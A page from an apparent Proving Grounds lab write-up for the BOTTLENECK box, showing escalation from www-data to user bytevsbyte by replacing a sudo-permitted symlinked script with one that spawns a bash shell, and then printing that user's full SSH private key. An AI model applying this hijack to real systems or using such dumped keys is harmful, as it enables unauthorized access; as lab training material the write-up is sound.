💣
Proving Grounds Writeups
  • kashz PG Writeups
  • PG boxes
    • ALGERNON
      • 4 :9998 IIS 10
      • 3 :80 IIS 10
      • 2 :21 ftp
      • 1 recon
    • APEX
      • 9 privesc
      • 8 box enum www-data
      • 7 :80 openemr exploit
      • 6 :3306 mysql
      • 5 :80 /filemanager 9.13.4
      • 4 :80 openemr
      • 3 :80 apex hospital
      • 2 :445 smb
      • 1 recon
    • AUTHBY
      • 6 privesc
      • 5 box enum apache
      • 4 :21 ftp admin
      • 3 :242 apache
      • 2 :21 ftp
      • 1 recon
    • BANZAI
      • 9 post enum
      • 8 mysql > privesc > root
      • 7 apache enum
      • 6 box enum www-data
      • 5 :8295 banzai
      • 4 :25 smtp
      • 3 :5432
      • 2 :21 ftp
      • 1 recon
    • BILLYBOSS
      • 7 privesc_2
      • 6 privesc_1
      • 5 box enum
      • 4 :8081
      • 3 :80
      • 2 :21 ftp
      • 1 recon
    • BOTTLENECK
      • 7 privesc > root
      • 6 www-data > bytevsbyte
      • 5 box enum PEAS
      • 4 box enum
      • 3 :80 exploit
      • 2 :80 bottleneck
      • 1 recon
    • BRATARINA
      • 4 :25 opensmtpd 6.6.2
      • 3 :80
      • 2 :139 :445 smb
      • 1 recon
    • CLAMAV
      • 4 :25 sendmail
      • 3 :80
      • 2 :139 :445 smb
      • 1 recon
    • CLYDE
      • 7 post enum
      • 6 box enum rabbitmq > privesc > root
      • 5 :4369 epmd
      • 4 :15672 rabbitmq
      • 3 :80
      • 2 :21 ftp
      • 1 recon
    • DAWN
      • 5 privesc
      • 4 box enum dawn
      • 3 cron exploit using smb
      • 2 :80
      • 1 recon
    • DIBBLE
      • 9 post enum
      • 8 box enum benjamin > privesc > root
      • 7 :3000 nodejs exploit
      • 6 :27017 mongodb
      • 5 :3000 node.js
      • 4 :80 drupal explore
      • 3 :80 drupal enum
      • 2 :21 ftp
      • 1 recon
    • FAIL
      • 5 post enum
      • 4 privesc fail2ban
      • 3 box enum fox
      • 2 :873 rsync
      • 1 recon
    • FUNBOXEASY
      • 4 post enum
      • 3 :22 ssh tony > root
      • 2 :80
      • 1 recon
    • FUNBOXEASYENUM
      • 4 privesc
      • 3 box enum www-data > privesc > root
      • 2 :80
      • 1 recon
    • G00G
      • 5 post enum
      • 4 privesc > root
      • 3 box enum fox
      • 2 :80
      • 1 recon
    • GAARA
      • 4 post enum
      • 3 gaara > root
      • 2 :80
      • 1 recon
    • HAWAT
      • 8 post enum
      • 6 :50080 nextcloud enum
      • 5 :50080 davtest
      • 4 :50080 nextcloud
      • 3 :30455 w3.css
      • 2 :17445 issue tracker
      • 1 recon
    • HELPDESK
      • 2 :8080 ManageEngine ServiceDesk Plus 7.6.0
      • 1 recon
    • HETEMIT
      • 10 post enum
      • 9 privesc > root
      • 8 box enum cmeeks
      • 7 :50000_2
      • 6 :50000_1
      • 5 :18000
      • 4 :80
      • 3 :139 :445 smb
      • 2 :21 ftp
      • 1 recon
    • HUNIT
      • 6 post enum
      • 5 privesc git-user git-repo > root
      • 4 fail privesc dademola-user git-repo
      • 3 box enum dademola
      • 2 :8080
      • 1 recon
    • HUTCH
      • 10 privesc_3 ldapsearch
      • 9 privesc_2 SharpLAPS
      • 8 privesc_1 PrintSpoofer
      • 7 box enum iis apppool
      • 6 :80 webdav
      • 5 :139 :445 smb
      • 4 ldap_2
      • 3 ldap_1
      • 2 :80 IIS 10.0
      • 1 recon
    • INTERNAL
      • 3 ms17-010
      • 2 :139 :445 smb
      • 1 recon
    • INTERFACE
      • 3 post enum
      • 2 :80
      • 1 recon
    • JACKO
      • 8 post enum
      • 7 privesc_2 PrintSpoofer
      • 6 privesc_1 PaperStream IP (TWAIN)
      • 5 box enum tony
      • 4 H2 JNIScriptEngine exploit > tony
      • 3 :8082
      • 2 :80
      • 1 recon
    • KEVIN
      • 3 :80 HP Power Manager 4.2
      • 2 :139 :445 smb
      • 1 recon
    • LAMPIAO
      • 7 post enum
      • 6 privesc KE
      • 5 box enum www-data
      • 4 drupalgeddon2 > www-data
      • 3 :1898 drupal 7
      • 2 :80
      • 1 recon
    • LOLY
      • 6 post enum
      • 5 privesc KE
      • 4 box enum www-data
      • 3 :80 wpscan
      • 2 :80
      • 1 recon
    • MEATHEAD
      • 7 privesc_2 Plantronics Hub 3.13.2
      • 6 privesc_1 PrintSpoofer
      • 5 box enum nt service\mssql$sqlexpress
      • 4 :1435 ms-sql 2017
      • 3 :1221 ftp
      • 2 :80 IIS 10.0
      • 1 recon
    • MEDJED
      • 8 privesc
      • 7 box enum
      • 6 :45332 :45443 QuizApp
      • 5 :44330 Barracuda Web-File-Server
      • 4 :44330 BarracudaDrive 6.5
      • 3 :33033
      • 2 :30021 ftp
      • 1 recon
    • METALLUS
      • 2 :40443 Application Manager
      • 1 recon
    • MONITORING
      • 4 privesc
      • 3 :80 box enum > www-data
      • 2 :80 nagios xi
      • 1 recon
    • MUDDY
      • 8 post enum
      • 7 privesc cronjob
      • 6 box enum www-data
      • 5 :80 webdav
      • 4 :8888 ladon framework
      • 3 :80 wpscan
      • 2 :80 muddy.ugc
      • 1 recon
    • MY-CMSMS
      • 6 privesc armour > root
      • 5 box enum www-data
      • 4 :80 cms ms login
      • 3 :3306 mysql
      • 2 :80 cms made simple
      • 1 recon
    • NAPPA
      • 7 post enum
      • 6 privesc
      • 5 box enum kathleen
      • 4 :8080
      • 3 :28080
      • 2 :21 ftp
      • 1 recon
    • NIBBLES
      • 5 post enum
      • 4 box enum > privesc > root
      • 3 :5437 postgresql
      • 2 :80
      • 1 recon
    • NICKEL
      • 6 :21 ftp > root
      • 5 box enum
      • 4 ssh ariah
      • 3 :8089 :33333 curl
      • 2 :8089 DevOps dashboard
      • 1 recon
    • NUKEM
      • 6 post enum
      • 5 privesc dosbox
      • 4 box enum http > commander
      • 3 :80 wordpress + exploit
      • 2 :80
      • 1 recon
    • PAYDAY
      • 6 patrick > privesc > root
      • 5 box enum_2
      • 4 box enum www-data
      • 3 :80 cs-cart internetshop
      • 2 :139 :445 smb
      • 1 recon
    • PEBBLES
      • 3 zoneminder sqlmap
      • 2 http
      • 1 recon
    • PELICAN
      • 7 post enum
      • 6 privesc > root
      • 5 box enum charles
      • 4 :8080 :8081
      • 3 :631 cups 2.2
      • 2 :139 :445 smb
      • 1 recon
    • PEPPO
      • 9 post enum
      • 8 privesc docker socket > root
      • 7 box enum eleanor
      • 6 :22 ssh eleanor
      • 5 docker enum postgres
      • 4 :5432 postgres
      • 3 :8080
      • 2 :113 ident
      • 1 recon
    • PHOTOGRAPHER
      • 6 post enum
      • 5 box enum > privesc
      • 4 :8000 koken cms
      • 3 :80
      • 2 :139 :445 smb
      • 1 recon
    • POSTFISH
      • 10 post enum
      • 9 privesc > root
      • 8 exploit /etc/postfix/disclaimer
      • 7 box enum
      • 6 :22 ssh
      • 5 sending mail to phish
      • 4 :110 pop3
      • 3 :25 smtp
      • 2 :80
      • 1 recon
    • POTATO
      • 6 post enum
      • 5 :22 ssh, box enum
      • 4 :80 strcmp php
      • 3 :80
      • 2 :2112 ftp
      • 1 recon
    • QUARTERJACK
      • 8 post enum
      • 7 privesc > root
      • 6 box enum apache
      • 5 :8081 rconfig
      • 4 :80
      • 3 :139 :445 smb
      • 2 :21 ftp
      • 1 recon
    • SEPPUKU
      • 10 privesc
      • 9 ssh tanto > privesc > root
      • 8 box enum samurai
      • 7 box enum seppuku
      • 6 :7601
      • 5 :7080
      • 4 :8088
      • 3 :80
      • 2 :139 :445 smb
      • 1 recon
    • SHENZI
      • 7 post enum
      • 6 privesc .msi
      • 5 box enum
      • 4 :80 wordpress > shenzi
      • 3 :80 xampp
      • 2 :139 :445 smb
      • 1 recon
    • SIROL
      • 5 post enum
      • 4 docker breakout > root
      • 3 :5601 kibana 6.5.0
      • 2 :80 php calculator
      • 1 recon
    • SLORT
      • 6 privesc
      • 5 box enum
      • 4 :4443 xampp
      • 3 :8080 xampp
      • 2 :21 ftp
      • 1 recon
    • SNOOKUMS
      • 8 post enum
      • 7 privesc
      • 6 box enum michael
      • 5 box enum apache
      • 4 :80
      • 3 :139 :445 smb
      • 2 :21 ftp
      • 1 recon
    • SORCERER
      • 7 post enum
      • 6 privesc > root
      • 5 box enum max
      • 4 :7742
      • 3 :8080 tomcat 7
      • 2 :80
      • 1 recon
    • SOSIMPLE
      • 6 ssh max > steven > root
      • 5 box enum_2
      • 4 box enum_1 www-data
      • 3 :80 wordpress
      • 2 :80
      • 1 recon
    • SUNSETMIDNIGHT
      • 7 privesc
      • 6 box enum www-data
      • 5 :80 wordpress admin
      • 4 :80 simply poll plugin sqli
      • 3 :80 wordpress
      • 2 :80
      • 1 recon
      • 0 /etc/hosts
    • SYBARIS
      • 7 post enum
      • 6 privesc cron
      • 5 box enum pablo
      • 4 :6379 redis
      • 3 :80 sybaris
      • 2 :21 ftp
      • 1 recon
    • TRE
      • 5 :22 ssh > privesc > root
      • 4 box enum www-data
      • 3 :80 mantis bug tracker
      • 2 :80
      • 1 recon
    • TWIGGY
      • 5 post enum
      • 4 :4506 SaltStack 3000.1
      • 3 :8000
      • 2 :80 mezzanine
      • 1 recon
    • UC404
      • 5 post enum
      • 4 box enum brian > privesc > root
      • 3 box enum www-data
      • 2 :80 adminlte
      • 1 recon
    • UT99
      • 8 privesc_3 wlbsctrl.dll hijack
      • 7 fail privesc_2 InspIRCd
      • 6 privesc_1 FoxitCloudUpdateService
      • 5 box enum daisy
      • 4 :7778 unreal tournament
      • 3 :6667 irc via pidgin
      • 2: 80
      • 1 recon
    • WALLA
      • 7 post enum
      • 6 privesc
      • 5 box enum www-data
      • 4 :8901 lighttpd 1.4.53 > raspAP
      • 3 :25 smtp
      • 2 :23 telnet
      • 1 recon
    • WEBCAL
      • 6 privesc KE
      • 5 box enum www-data
      • 4 :53 dns
      • 3 :80 webcalendar 1.2.3
      • 2 :21 ftp
      • 1 recon
    • WOMBO
      • 6 post enum
      • 5 :6379 redis
      • 4 :27017 mongo
      • 3 :8080 nodebb
      • 2 :80
      • 1 recon
    • XPOSEDAPI
      • 3 box enum clumsyadmin > root
      • 2 :13337 remote software management api
      • 1 recon
    • Y0USEF
      • 5 post enum
      • 4 privesc
      • 3 box enum
      • 2 :80
      • 1 recon
    • ZENPHOTO
      • 9 post enum
      • 8 privesc_2 full-nelson
      • 7 privesc_1 rds
      • 6 privesc check
      • 5 box enum www-data
      • 4 :80 zenphoto 1.4.1.4
      • 3 :80
      • 2 :23 cups 1.4
      • 1 recon
    • ZINO
      • 6 post enum
      • 5 privesc > root
      • 4 box enum www-data
      • 3 :8003
      • 2 :139 :445 smb
      • 1 recon
Powered by GitBook
On this page
  1. PG boxes
  2. BOTTLENECK

6 www-data > bytevsbyte

www-data@bottleneck:/tmp$ sudo -u bytevsbyte "/var/www/html/web_utils/clear_logs"

# tried making rm using msfvenom - didnt work

www-data@bottleneck:/tmp$ cat "/var/www/html/web_utils/clear_logs"
#!/bin/bash
rm -f /var/log/soc/intrusion_*
www-data@bottleneck:/tmp$ ls -la /opt
total 16
drwxr-xr-x  2 root       root       4096 Sep 27  2019 .
drwxr-xr-x 20 root       root       4096 Feb 20  2020 ..
-rwxr--r--  1 bytevsbyte bytevsbyte   43 Sep 27  2019 clear_logs.sh
-rw-r--r--  1 root       root        359 Sep 27  2019 ids_strong_bvb.py
# cannot write / modify here

www-data@bottleneck:/tmp$ ls -la /var/www/html/web_utils/
total 8
drwxrwxr-x 2 www-data www-data 4096 Mar  2  2020 .
drwxr-xr-x 7 root     root     4096 Sep 26  2019 ..
lrwxrwxrwx 1 root     root       18 Mar  2  2020 clear_logs -> /opt/clear_logs.sh
# can write and modify here - we can change the symlink

# method 1 - change symlink 
echo -e "/bin/bash\n/bin/bash" > kashz.sh
ln -fs kashz.sh /var/www/html/web_utils/clear_logs

# delete symlink & change clear_logs directly as we have full control over it
rm clear_logs
echo -e "/bin/bash\n/bin/bash" > clear_logs
chmod 777 clear_logs

sudo -u bytevsbyte "/var/www/html/web_utils/clear_logs"

bytevsbyte@bottleneck:~/html/web_utils$ whoami;id;hostname
bytevsbyte
uid=1000(bytevsbyte) gid=1000(bytevsbyte) groups=1000(bytevsbyte),4(adm),24(cdrom),30(dip),46(plugdev),1001(tester)
bottleneck

id_rsa found in /home/bytevsbyte/.ssh/

-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn
NhAAAAAwEAAQAAAQEAzoX5U05QeNLJYemVJ66WEk8xrUFPpAThbnf8236hv4zpIsGciMeF
r6Mam8QogTn3ZayuPNNRxAXUbGH3a3DCMwMvFkuGRBNSa5tdy0ELth26/BYA1dr8tGX5+v
kUHpMT6TBd3diHsb0j9tYaaoJX6gFNzfPfZZNvd2jek9B/6NyBi5OaXehLMXaJEnFVuaRo
VDEAmNKb+yzpb/YAkfrHjjhQRdxywSlbgAsqJJrVwK5fCf0rwKjJRXoRp3m8v3Fa8Jfx5Y
IR/EU39XIqcBWWwGeDLikr/nYixN+9F/PfUB26SLlEg2Gq0M2IniS2RaLNbhReEO1OQzMF
anJjSpYUBQAAA9DcA5rM3AOazAAAAAdzc2gtcnNhAAABAQDOhflTTlB40slh6ZUnrpYSTz
GtQU+kBOFud/zbfqG/jOkiwZyIx4WvoxqbxCiBOfdlrK4801HEBdRsYfdrcMIzAy8WS4ZE
E1Jrm13LQQu2Hbr8FgDV2vy0Zfn6+RQekxPpMF3d2IexvSP21hpqglfqAU3N899lk293aN
6T0H/o3IGLk5pd6EsxdokScVW5pGhUMQCY0pv7LOlv9gCR+seOOFBF3HLBKVuACyokmtXA
rl8J/SvAqMlFehGneby/cVrwl/HlghH8RTf1cipwFZbAZ4MuKSv+diLE370X899QHbpIuU
SDYarQzYieJLZFos1uFF4Q7U5DMwVqcmNKlhQFAAAAAwEAAQAAAQAwK4OJ8LxIUjHyin7l
sI0EXEBj/tXKlfDWyVnLAHBNs1o1Zx9Rr+f4nXx5VHl2GsUfi/Vf7pIlvI5dcUQ6ZSSGrX
lwI9F/U1poCucHn3ZR1gFlBuTO/LLwiNCTv0D4GKoOO9/I/NY5mLoouquSqDBFPmSdYwJ6
OLdJDMbNh1YuQ8Tq7TahEUUFUG3/rTckzVbluTS9bujEAT4ePyRXJH9SsDtOvj3US/z4IR
vcI9YYIN/a1fvT1Ve18PbuUlBtJt5qcRRLifPni7smnWcK27mf02KjSo/nyMyztExsHDj8
05CVh3QZzjGFLLhNXBaowgg8pK0GhbLu7LujvQGiGwHBAAAAgQC7iLFhOVhE9+5SLuMQIp
Dc4S25YJPhENGzILpo/uAMyDG8jGNGezaHgTh3UknZvZRJc3EFOnHJv9KAL3jncYrGfU97
rBDuJAVtTe5JbydQL1ToXqLeCc0KjHPx2ZiOvG4+kBldseMzuuEhKuKJjQO82D9HFRLCqg
yEgHfj/EkoMQAAAIEA84haO5pgnlHYOxMRiWCfhh+ggo6ia6W5dm2poM3xVMsP0skg7Kif
053r6x/wVL4JJWL/Y+G8+THGPnT1YZ2/EItDoi/IDX1tJTz1ZHuEPqdmWz/klx7EkKk7Ii
hVlBaH6qpOFyox6coJNqCKXoRuqiI32XywRzdO1HaUdZpY/m0AAACBANkYl25EYsM8+jEw
uZ4GNksXym4vpCTllBrCTWcQFt8yxRyJiPiBNhMEr/GGKWDBaj3G6hu2CbswMfOQrupMAx
ZKI92d1zv4mnb26YlKxS+TnJjdEKULwsdjvYXtkHnD15Ir1SkbYkZ62wFEXuOub1+TUuTK
DV+puVeQaQrgj4z5AAAAFWJ5dGV2c2J5dGVAYm90dGxlbmVjawECAwQF
-----END OPENSSH PRIVATE KEY-----
Previous7 privesc > rootNext5 box enum PEAS

Last updated 3 years ago